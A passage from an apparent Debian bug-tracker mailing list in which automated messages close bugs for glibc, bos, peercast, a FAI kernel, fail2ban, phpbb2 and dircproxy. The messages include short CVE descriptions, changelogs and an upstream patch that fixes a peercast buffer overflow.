glibc-doc_2.3.6.ds1-13etch5_all.deb
  to pool/main/g/glibc/glibc-doc_2.3.6.ds1-13etch5_all.deb
glibc_2.3.6.ds1-13etch5.diff.gz
  to pool/main/g/glibc/glibc_2.3.6.ds1-13etch5.diff.gz
glibc_2.3.6.ds1-13etch5.dsc
  to pool/main/g/glibc/glibc_2.3.6.ds1-13etch5.dsc
libc6-amd64_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-amd64_2.3.6.ds1-13etch5_i386.deb
libc6-dbg_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch5_i386.deb
libc6-dev-amd64_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-dev-amd64_2.3.6.ds1-13etch5_i386.deb
libc6-dev_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-dev_2.3.6.ds1-13etch5_i386.deb
libc6-i686_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-i686_2.3.6.ds1-13etch5_i386.deb
libc6-pic_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-pic_2.3.6.ds1-13etch5_i386.deb
libc6-prof_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-prof_2.3.6.ds1-13etch5_i386.deb
libc6-udeb_2.3.6.ds1-13etch5_i386.udeb
  to pool/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch5_i386.udeb
libc6-xen_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6-xen_2.3.6.ds1-13etch5_i386.deb
libc6_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/libc6_2.3.6.ds1-13etch5_i386.deb
libnss-dns-udeb_2.3.6.ds1-13etch5_i386.udeb
  to pool/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch5_i386.udeb
libnss-files-udeb_2.3.6.ds1-13etch5_i386.udeb
  to pool/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch5_i386.udeb
locales-all_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/locales-all_2.3.6.ds1-13etch5_i386.deb
locales_2.3.6.ds1-13etch5_all.deb
  to pool/main/g/glibc/locales_2.3.6.ds1-13etch5_all.deb
nscd_2.3.6.ds1-13etch5_i386.deb
  to pool/main/g/glibc/nscd_2.3.6.ds1-13etch5_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Aurelien Jarno <[EMAIL PROTECTED]> (supplier of updated glibc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 12 Jan 2008 16:06:00 +0100
Source: glibc
Binary: libc0.1-prof libc6-dev-amd64 locales-all libc6-i686 libc6-dev-ppc64 
libc0.3-pic glibc-doc libc0.3 libc0.1-i686 libc0.1-i386 libc6.1-dev libc6-s390x 
libnss-files-udeb libc0.1-dev-i386 libc6-dev-sparc64 libc6-i386 libc0.3-dev 
libc6-udeb libc6-dbg libc6.1-pic libc6-dev libc0.3-prof libc6-sparcv9 
libc0.1-udeb libc6-dev-i386 libc6.1-prof libc0.1-dev locales libc6-pic 
libc0.3-udeb libc6-dev-powerpc libc0.1-pic libc6-ppc64 libc0.3-dbg libc0.1-dbg 
libc6-amd64 libc0.1 libc6-prof libc6-xen libc6-powerpc libc6 libc6-sparcv9b 
libc6.1-udeb libc6.1-dbg nscd libc6-sparc64 libnss-dns-udeb libc6.1 
libc6-dev-s390x
Architecture: source i386 all
Version: 2.3.6.ds1-13etch5
Distribution: stable
Urgency: low
Maintainer: GNU Libc Maintainers <[EMAIL PROTECTED]>
Changed-By: Aurelien Jarno <[EMAIL PROTECTED]>
Description: 
 glibc-doc  - GNU C Library: Documentation
 libc6  - G

Bug#440638: marked as done (copyright infringement in bos)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:01 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#440638: fixed in bos 1.1.dfsg-0etch1
has caused the Debian Bug report #440638,
regarding copyright infringement in bos
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
440638: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=440638
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: bos
Severity: serious

David, will you do this upload?  Otherwise, are you ok with an NMU?

On Wed, Aug 29, 2007 at 09:57:02PM +0200, Cyril Brulebois wrote:
> Robert Millan <[EMAIL PROTECTED]> (29/08/2007):
> > Looks like the music files in bos are not legaly distributable.  This
> > is an excerpt from an IRC conversation (in #bos / freenode):
> > 
> > 18:43 < feb> nyu: still have that bug with 2.4 ?
> > 19:02 < nyu> feb: nope.  but I wonder why the music went away
> > 19:03 < nyu> it was nice with 1.1
> > 19:05 < feb> nyu: it got removed because we didnt have the right to
> >  distribute it [...]
> > 20:17 < nyu> usunoro: the sound effects and voices are properly licensed?
> > 20:17 < usunoro> i believe so
> 
> My point of view has been asked about this, since I'm packaging boswars,
> which is the fusion of both stratagus and bos. If as it seems there are
> legal troubles with bos, I guess it is quite safe to upload a fixed
> packaged (e.g. by NMUing it), removing offending parts. The package
> currently worked on being another source package, I don't think it is
> needed that *I* do this particular upload.
> 
> Cheers,
> 
> -- 
> Cyril Brulebois

-- 
Robert Millan

 I know my rights; I want my phone call!
 What use is a phone call, if you are unable to speak?
(as seen on /.)

--- End Message ---
--- Begin Message ---
Source: bos
Source-Version: 1.1.dfsg-0etch1

We believe that the bug you reported is fixed in the latest version of
bos, which is due to be installed in the Debian FTP archive:

bos_1.1.dfsg-0etch1.diff.gz
  to pool/main/b/bos/bos_1.1.dfsg-0etch1.diff.gz
bos_1.1.dfsg-0etch1.dsc
  to pool/main/b/bos/bos_1.1.dfsg-0etch1.dsc
bos_1.1.dfsg-0etch1_all.deb
  to pool/main/b/bos/bos_1.1.dfsg-0etch1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Robert Millan <[EMAIL PROTECTED]> (supplier of updated bos package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Mon, 28 Jan 2008 19:21:22 +0100
Source: bos
Binary: bos
Architecture: source all
Version: 1.1.dfsg-0etch1
Distribution: stable
Urgency: low
Maintainer: David Martínez Moreno <[EMAIL PROTECTED]>
Changed-By: Robert Millan <[EMAIL PROTECTED]>
Description: 
 bos- Invasion: Battle of Survival data set for Stratagus
Closes: 440638
Changes: 
 bos (1.1.dfsg-0etch1) stable; urgency=low
 .
   * NMU.
   * data/music/title.ogg: Removing since according to upstream we have no
 rights to distribute it.  (Closes: #440638)
Files: 
 c0897571d40ee09bb1df32c7c219b8f0 580 games optional bos_1.1.dfsg-0etch1.dsc
 ee9a5da9cff0d564585b0c5973b1e833 2646 games optional 
bos_1.1.dfsg-0etch1.diff.gz
 e61d1f4aade0b9a90254cc0f502ad96d 14403162 games optional 
bos_1.1.dfsg-0etch1_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHnjQrC19io6rUCv8RAg+mAJwLzqOszw9y/gNOSYLBptSfO483NACfaUI1
EGTsTcw6Rt9qPiVGmElxuHs=
=oj+N
-END PGP SIGNATURE-


--- End Message ---


Bug#457300: marked as done (peercast: CVE-2007-6454 heap-based buffer overflow possibly leading to code execution)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:24 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#457300: fixed in peercast 0.1217.toots.20060314-1etch0
has caused the Debian Bug report #457300,
regarding peercast: CVE-2007-6454 heap-based buffer overflow possibly leading 
to code execution
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
457300: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=457300
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: peercast
Version: 0.1217.toots.20060314-1
Severity: grave
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for peercast.

CVE-2007-6454[0]:
| Heap-based buffer overflow in the handshakeHTTP function in servhs.cpp
| in PeerCast 0.1217 and earlier, and SVN 344 and earlier, allows remote
| attackers to cause a denial of service and possibly execute arbitrary
| code via a long SOURCE request.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

Attached is a patch extracted from the upstream svn to fix 
this.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6454

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
Index: servhs.cpp
===
--- servhs.cpp	(revision 328)
+++ servhs.cpp	(revision 347)
@@ -43,6 +43,8 @@
 {
 	if (!*cp)
 		return NULL;
+
+	int cnt=0;
 
 	// fetch command
 	while (*cp)
@@ -51,10 +53,15 @@
 		if (c == '=')
 			break;
 		else
-			*cmd++ = c;
+			*cmd++ = c;
+
+		cnt++;
+		if (cnt >= (MAX_CGI_LEN-1))
+			break;
 	}
 	*cmd = 0;
-
+
+	cnt=0;
 	// fetch arg
 	while (*cp)
 	{
@@ -62,7 +69,11 @@
 		if (c == '&')
 			break;
 		else
-			*arg++ = c;
+			*arg++ = c;
+
+		cnt++;
+		if (cnt >= (MAX_CGI_LEN-1))
+			break;
 	}
 	*arg = 0;
 
@@ -302,13 +313,13 @@
 	mount[-1] = 0; // password preceeds
 	break;
 }
-			strcpy(loginPassword,in+7);
+			loginPassword.set(in+7);
 			
-			LOG_DEBUG("ICY client: %s %s",loginPassword,mount?mount:"unknown");
+			LOG_DEBUG("ICY client: %s %s",loginPassword.cstr(),mount?mount:"unknown");
 		}
 
 		if (mount)
-			strcpy(loginMount,mount);
+			loginMount.set(mount);
 
 		handshakeICY(Channel::SRC_ICECAST,isHTTP);
 		sock = NULL;	// socket is taken over by channel, so don`t close it
@@ -318,7 +329,7 @@
 		if (!isAllowed(ALLOW_BROADCAST))
 			throw HTTPException(HTTP_SC_UNAVAILABLE,503);
 
-		strcpy(loginPassword,servMgr->password);	// pwd already checked
+		loginPassword.set(servMgr->password);	// pwd already checked
 
 		sock->writeLine("OK2");
 		sock->writeLine("icy-caps:11");
@@ -640,9 +651,9 @@
 // ---
 void Servent::handshakeCMD(char *cmd)
 {
-	char result[256];
-	char arg[512];
-	char curr[256];
+	char result[MAX_CGI_LEN];
+	char arg[MAX_CGI_LEN];
+	char curr[MAX_CGI_LEN];
 
 	char	jumpStr[128];
 	char	*jumpArg=NULL;
@@ -831,6 +842,8 @@
 	// connections
 	else if (strcmp(curr,"maxcin")==0)
 		servMgr->maxControl = getCGIargINT(arg);
+	else if (strcmp(curr,"maxsin")==0)
+		servMgr->maxServIn = getCGIargINT(arg);
 
 	else if (strcmp(curr,"maxup")==0)
 		servMgr->maxBitrateOut = getCGIargINT(arg);
@@ -1488,15 +1501,15 @@
 	while (http.nextHeader())
 	{
 		LOG_DEBUG("ICY %s",http.cmdLine);
-		readICYHeader(http,info,loginPassword);
+		readICYHeader(http,info,loginPassword.cstr());
 	}
 
 
 		
 	// check password before anything else, if needed
-	if (strcmp(servMgr->password,loginPassword)!=0)
+	if (loginPassword != servMgr->password)
 	{
-		if (!sock->host.isLocalhost() || strlen(loginPassword))
+		if (!sock->host.isLocalhost() || !loginPassword.isEmpty())
 			throw HTTPException(HTTP_SC_UNAUTHORIZED,401);
 	}
 
@@ -1510,7 +1523,7 @@
 
 
 	info.id = chanMgr->broadcastID;
-	info.id.encode(NULL,info.name.cstr(),loginMount,info.bitrate);
+	info.id.encode(NULL,info.name.cstr(),loginMount.cstr(),info.bitrate);
 
 	LOG_DEBUG("Incoming source: %s : %s",info.name.cstr(),ChanInfo::getTypeStr(info.contentType));
 
@@ -1531,7 +1544,7 @@
 	info.comment = chanMgr->broadcastMsg;
 	info.bcID = chanMgr->broadcastID;
 
-	c = chanMgr->createChannel(info,loginMount);
+	c = chanMgr->createChannel(info,loginMount.cstr());
 	if (!c)
 		throw HTTPException(HTTP_SC_UNAVAILABLE,503);
 


pgpWJUBpDD56j.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: peercast
Source-Version: 0.1217.toots.20060314-1etch0

We believe that th

Bug#461493: marked as done (linux-2.6: [ia64] FP instructions/misaligned access cause silent user data corruption)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:06 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#461493: fixed in fai-kernels 1.17+etch.18etch1
has caused the Debian Bug report #461493,
regarding linux-2.6: [ia64] FP instructions/misaligned access cause silent user 
data corruption
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
461493: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=461493
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: linux-2.6
Version: 2.6.18.dfsg.1-17
Severity: critical
Tags: patch
Justification: causes serious data loss

References:
  
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=1a499150e4ec1299232e24389f648d059ce5617a
  https://bugzilla.redhat.com/show_bug.cgi?id=428920
  https://bugzilla.novell.com/show_bug.cgi?id=354069

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: ia64

Kernel: Linux 2.6.22-3-mckinley (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash


--- End Message ---
--- Begin Message ---
Source: fai-kernels
Source-Version: 1.17+etch.18etch1

We believe that the bug you reported is fixed in the latest version of
fai-kernels, which is due to be installed in the Debian FTP archive:

fai-kernels_1.17+etch.18etch1.dsc
  to pool/main/f/fai-kernels/fai-kernels_1.17+etch.18etch1.dsc
fai-kernels_1.17+etch.18etch1.tar.gz
  to pool/main/f/fai-kernels/fai-kernels_1.17+etch.18etch1.tar.gz
fai-kernels_1.17+etch.18etch1_i386.deb
  to pool/main/f/fai-kernels/fai-kernels_1.17+etch.18etch1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
dann frazier <[EMAIL PROTECTED]> (supplier of updated fai-kernels package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 12 Feb 2008 09:59:43 -0700
Source: fai-kernels
Binary: fai-kernels
Architecture: source i386
Version: 1.17+etch.18etch1
Distribution: stable-security
Urgency: high
Maintainer: Holger Levsen <[EMAIL PROTECTED]>
Changed-By: dann frazier <[EMAIL PROTECTED]>
Description: 
 fai-kernels - special kernels for FAI (Fully Automatic Installation)
Closes: 460337 461493
Changes: 
 fai-kernels (1.17+etch.18etch1) stable-security; urgency=high
 .
   * Rebuild against linux-source-2.6.18 (2.6.18.dfsg.1-18etch1)
 * bugfix/vmsplice-security.patch
   [SECURITY] Fix missing access check in vmsplice.
   See CVE-2008-0010, CVE-2008-0600
 * bugfix/all/vserver/proc-link-security.patch
   [SECURITY][vserver] Fix access checks for the links in /proc/$pid.
   * Changes from linux-source-2.6.18 (2.6.18.dfsg.1-18)
 [ Martin Michlmayr ]
 * [mips] Fix network on Cobalt RaQ1, thanks Thomas Bogendoerfer
   (closes: #460337).
 .
 [ dann frazier ]
 * [ia64] Fix an issue with unaligned accesses and certain floating point
   instructions that can result in silent user data corruption
   (closes: #461493).
 * Update abi reference files for ABI 6
Files: 
 42ad7f3b4925c86466a12f6af1f60d34 740 admin extra 
fai-kernels_1.17+etch.18etch1.dsc
 1d940e99b60ea13d97af2a2c7091b7ca 56178 admin extra 
fai-kernels_1.17+etch.18etch1.tar.gz
 f19755f1460aadb94f355e4b601e90e5 5503064 admin extra 
fai-kernels_1.17+etch.18etch1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHsgPjhuANDBmkLRkRAhllAJ4ws/6hlYtCuBq9u3YHVpjEoQ0DHwCbB8Lt
HMTbm1UMBp9kLHIG5gw+Jus=
=oF8O
-END PGP SIGNATURE-


--- End Message ---


Bug#439962: marked as done (fail2ban might deadlock, taking cron.daily with it)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:06 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#439962: fixed in fail2ban 0.7.5-2etch1
has caused the Debian Bug report #439962,
regarding fail2ban might deadlock, taking cron.daily with it
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
439962: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=439962
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: fail2ban
Version: 0.7.5-2
Severity: critical

For whatever reason, my fail2ban process is hung in a deadlock:

seamus:/etc/init.d> sudo strace -p 11867
Process 11867 attached - interrupt to quit
futex(0x81dbef0, FUTEX_WAIT, 0, NULL

As a result, fail2ban-client reload will indefinitely wait:

seamus:/etc/init.d> sudo strace python2.4 /usr/bin/fail2ban-client reload 
[...]
socket(PF_FILE, SOCK_STREAM, 0) = 3
connect(3, {sa_family=AF_FILE, path="/tmp/fail2ban.sock"}, 20

This again causes the logrotate postrotate script to hang, which
causes logrotate to hang, which causes cron.daily to hang.

seamus:/etc/init.d> ps aux | grep -c fail2ban-client
11
seamus:/etc/init.d> ps aux | grep -c logrotate
22
seamus:/etc/init.d> ps aux | grep -c cron.daily
41

Undoubtedly, cron.daily or logrotate could use timeouts. Until they
do, this is a critical bug in fail2ban because it breaks unrelated
software.

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-4-686
Locale: LANG=en_GB, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)

Versions of packages fail2ban depends on:
ii  iptables1.3.6.0debian1-5 administration tools for packet fi
ii  lsb-base3.1-23.2etch1Linux Standard Base 3.1 init scrip
ii  python  2.4.4-2  An interactive high-level object-o
ii  python-central  0.5.12   register and build utility for Pyt
ii  python2.4   2.4.4-3  An interactive high-level object-o

fail2ban recommends no packages.

-- no debconf information

-- 
 .''`.   martin f. krafft <[EMAIL PROTECTED]>
: :'  :  proud Debian developer, author, administrator, and user
`. `'`   http://people.debian.org/~madduck - http://debiansystem.info
  `-  Debian - when you have better things to do than fixing systems


digital_signature_gpg.asc
Description: Digital signature (see http://martin-krafft.net/gpg/)
--- End Message ---
--- Begin Message ---
Source: fail2ban
Source-Version: 0.7.5-2etch1

We believe that the bug you reported is fixed in the latest version of
fail2ban, which is due to be installed in the Debian FTP archive:

fail2ban_0.7.5-2etch1.diff.gz
  to pool/main/f/fail2ban/fail2ban_0.7.5-2etch1.diff.gz
fail2ban_0.7.5-2etch1.dsc
  to pool/main/f/fail2ban/fail2ban_0.7.5-2etch1.dsc
fail2ban_0.7.5-2etch1_all.deb
  to pool/main/f/fail2ban/fail2ban_0.7.5-2etch1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Yaroslav Halchenko <[EMAIL PROTECTED]> (supplier of updated fail2ban package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 01 May 2007 22:18:03 -0400
Source: fail2ban
Binary: fail2ban
Architecture: source all
Version: 0.7.5-2etch1
Distribution: stable-security
Urgency: high
Maintainer: Yaroslav Halchenko <[EMAIL PROTECTED]>
Changed-By: Yaroslav Halchenko <[EMAIL PROTECTED]>
Description: 
 fail2ban   - bans IPs that cause multiple authentication errors
Closes: 421848 434368 439962
Changes: 
 fail2ban (0.7.5-2etch1) stable-security; urgency=high
 .
   * Propagated fix for asctime pattern from 0.7.8 release (closes: #421848)
   * Propagated fix for not closed log files from 0.7.8-1
 (closes: #439962,434368)
   * Propagated fix for "reload" bug which is as sever as #439962 and just
 never was hit by any Debian user yet
   * Added patch 00_numeric_iptables-L to avoid possible DoS attacks
 (introduced upstream in 0.7.6)
   * Propagated "Fixed removal of host in hosts.deny" from 0.7.6, to prevent
 possible DoS
   * CVE-2007-4321: anchored sshd and vsftpd failregex at the end of line
 to prevent DoS on those services

Bug#463589: marked as done (phpbb2: CVE-2008-0471 XSRF vulnerability exploitable via crafted private message)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:25 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#463589: fixed in phpbb2 2.0.21-7
has caused the Debian Bug report #463589,
regarding phpbb2: CVE-2008-0471 XSRF vulnerability exploitable via crafted 
private message
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
463589: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=463589
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Source: phpbb2
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for phpbb2.

CVE-2008-0471[0]:
| Cross-site request forgery (CSRF) vulnerability in privmsg.php in
| phpBB 2.0.22 allows remote attackers to delete private messages (PM)
| as arbitrary users via a deleteall action.

I tested this sucessfully in a local phpbb2 installation as 
well as on phpbb.de using two test accounts.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0471

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpiAmLWmIAD1.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: phpbb2
Source-Version: 2.0.21-7

We believe that the bug you reported is fixed in the latest version of
phpbb2, which is due to be installed in the Debian FTP archive:

phpbb2-conf-mysql_2.0.21-7_all.deb
  to pool/main/p/phpbb2/phpbb2-conf-mysql_2.0.21-7_all.deb
phpbb2-languages_2.0.21-7_all.deb
  to pool/main/p/phpbb2/phpbb2-languages_2.0.21-7_all.deb
phpbb2_2.0.21-7.diff.gz
  to pool/main/p/phpbb2/phpbb2_2.0.21-7.diff.gz
phpbb2_2.0.21-7.dsc
  to pool/main/p/phpbb2/phpbb2_2.0.21-7.dsc
phpbb2_2.0.21-7_all.deb
  to pool/main/p/phpbb2/phpbb2_2.0.21-7_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thijs Kinkhorst <[EMAIL PROTECTED]> (supplier of updated phpbb2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat,  9 Feb 2008 00:27:23 +0100
Source: phpbb2
Binary: phpbb2-languages phpbb2-conf-mysql phpbb2
Architecture: source all
Version: 2.0.21-7
Distribution: stable-security
Urgency: high
Maintainer: Jeroen van Wolffelaar <[EMAIL PROTECTED]>
Changed-By: Thijs Kinkhorst <[EMAIL PROTECTED]>
Description: 
 phpbb2 - A fully featured and skinnable flat (non-threaded) webforum
 phpbb2-conf-mysql - Automatic configurator for phpbb2 on MySQL database
 phpbb2-languages - phpBB2 additional languages
Closes: 463589
Changes: 
 phpbb2 (2.0.21-7) stable-security; urgency=high
 .
   * Upload to stable to fix cross site request forgery in
 private messaging (CVE-2008-0471, closes: #463589).
Files: 
 88ad3a4f2ee714cce779873b53ebd323 1051 web optional phpbb2_2.0.21-7.dsc
 30383a9bf6c5d21736e4bdf9ec7852d5 3203456 web optional phpbb2_2.0.21.orig.tar.gz
 896f80500e90867741c516e57fc8bfcc 90580 web optional phpbb2_2.0.21-7.diff.gz
 e8825ef3431bfe7ccf72f9f59f13a119 554842 web optional phpbb2_2.0.21-7_all.deb
 49baf96bcc1c273a93e8bb5169dca722 53706 web extra 
phpbb2-conf-mysql_2.0.21-7_all.deb
 afd8a0fe8138c8a5cf00a3e4ac10ac59 2791410 web optional 
phpbb2-languages_2.0.21-7_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR6z0YGz0hbPcukPfAQK92gf/Yp71BGmPqZdqrNlRdcLUIcWM2u1Tz/am
zttJsmSCHolwbW8OCtXHVfm2jZpNGwnn2WV6iiYhrXVP61FGbciqHiqL88sqw3aT
6jcUlC3POIIH5P9gwS8MyO5+fxn+6P8sneVhAJSZWR/2xq9LlorOMdpEBfI0o82I
6CESjBDX9+9EFckCZVW8dqqVk7H32jwDyFFpZbgqDbhmkax/mBDa+IJRanj7SSdf
CkHN7oxTgWFzJCC0CdsqAFVN5VKyH6CYEybuz0nUaOjUB0CfpI5XRGu5KVjuHhDq
ZRd/cE9R8QdW2ooY+Ee2GbEWCxv1WsGuQJm1zgJywlXC8AtYhtB4mQ==
=TJeW
-END PGP SIGNATURE-


--- End Message ---


Processed: retitle 230358 to RM: ipxripd/stable -- RoSRM; only works with 2.4 kernels ...

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.12
> retitle 230358 RM: ipxripd/stable -- RoSRM; only works with 2.4 kernels
Bug#230358: ipxripd: doesn't work with kernel 2.6.x
Changed Bug title to `RM: ipxripd/stable -- RoSRM; only works with 2.4 kernels' 
from `ipxripd: doesn't work with kernel 2.6.x'.

> reassign 230358 ftp.debian.org
Bug#230358: RM: ipxripd/stable -- RoSRM; only works with 2.4 kernels
Bug reassigned from package `ipxripd' to `ftp.debian.org'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#445883: marked as done (CVE-2007-5226 remote denial of service)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:04 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#445883: fixed in dircproxy 1.0.5-5etch1
has caused the Debian Bug report #445883,
regarding CVE-2007-5226 remote denial of service
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
445883: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=445883
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: dircproxy
Version: 1.0.5-3
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for dircproxy.

CVE-2007-5226[0]:
| irc_server.c in dircproxy 1.2.0 and earlier allows remote attackers to
| cause a denial of service (segmentation fault) via an ACTION command
| without a parameter, which triggers a NULL pointer dereference, as
| demonstrated using a blank /me message from irssi.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

The null pointer dereference itself is not that big kind of 
a problem here but since this also means to lose the data 
you want to read while you are away I mark this as grave.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5226

Kind regards
Nico

-- 
Nico Golde - http://ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpp9uFwo41C9.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
